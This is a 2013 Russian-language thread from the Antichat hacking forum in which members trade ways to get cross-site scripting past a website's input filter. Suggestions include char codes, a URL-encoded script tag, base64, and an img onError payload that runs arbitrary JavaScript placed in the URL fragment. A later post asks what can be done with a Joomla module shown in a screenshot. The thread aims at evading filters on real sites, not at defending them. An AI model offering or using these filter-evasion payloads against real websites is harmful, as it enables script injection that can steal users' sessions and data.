Xss-фильтр

Discussion in 'Песочница' started by Onths, 14 Feb 2013.

  1. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    Фильтр режет и ставит символы/пробелы.

    <sc ript>a lert()</sc ript>

    Теперь вот это:

    <IMG SRC="jav ascript:alert('XSS');">

    <IMG SRC="jav * ascript:a lert('XSS');">

    Быть может у кого-то есть опыт.
     
    #1 Onths, 14 Feb 2013
    Last edited: 14 Feb 2013
  2. FryTvin

    FryTvin New Member

    Joined:
    10 Nov 2012
    Messages:
    15
    Likes Received:
    2
    Reputations:
    6
    char code попробуй.
     
    #2 FryTvin, 14 Feb 2013
  3. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    +1

    <script>alert(/XSS/)</script>

    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%58%53%53%2f%29%3c%2f%73%63%72%69%70%74%3e
     
    #3 RoksHD, 14 Feb 2013
  4. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    base64 помогает бывает
     
    #4 boortyhuhtyu, 14 Feb 2013
  5. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    Преобразовывает и режет.
     
    #5 Onths, 14 Feb 2013
  6. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    В base режет - data. d ata
     
    #6 Onths, 14 Feb 2013
  7. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    <img src="#$@#*$&" onError="eval(decodeURIComponent(location.href).split('#')[1])" />

    + Добавь к адресной строке:

    #здесь твой яваскрипт код
     
    #7 |qbz|, 14 Feb 2013
    Last edited: 14 Feb 2013
    1 person likes this.
  8. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4

    Никакой реакции, довольно странно, учитывая жесткую фильтрацию.
     
    #8 Onths, 14 Feb 2013
  9. FryTvin

    FryTvin New Member

    Joined:
    10 Nov 2012
    Messages:
    15
    Likes Received:
    2
    Reputations:
    6
    А если формата SQL кода ? 0x ???
     
    #9 FryTvin, 14 Feb 2013
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Что за бред развели в теме? Сюда пример сайта, могу посмотреть в ПМ. Никто его взламывать не будет.
     
    #10 randman, 15 Feb 2013
  11. Улыбайся

    Улыбайся Member

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Подскажите что здесь можно сделать?
    http://i078.radikal.ru/1303/14/ec62f094706e.png
     
    #11 Улыбайся, 2 Mar 2013
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Для точного ответа нужен сайт. Модуль Joomla - com_cabinet, сейчас проверил на нескольких сайтах, XSS там не наблюдалось.
     
    #12 randman, 3 Mar 2013
    Last edited: 3 Mar 2013
(You must log in or sign up to post here.)
Loading...
Similar Threads - фильтр
  1. raarkil

    Curl и фильтры потоков

    raarkil, 29 Jan 2023, in forum: Песочница
    Replies:
    4
    Views:
    2,897
    raarkil
    1 Feb 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.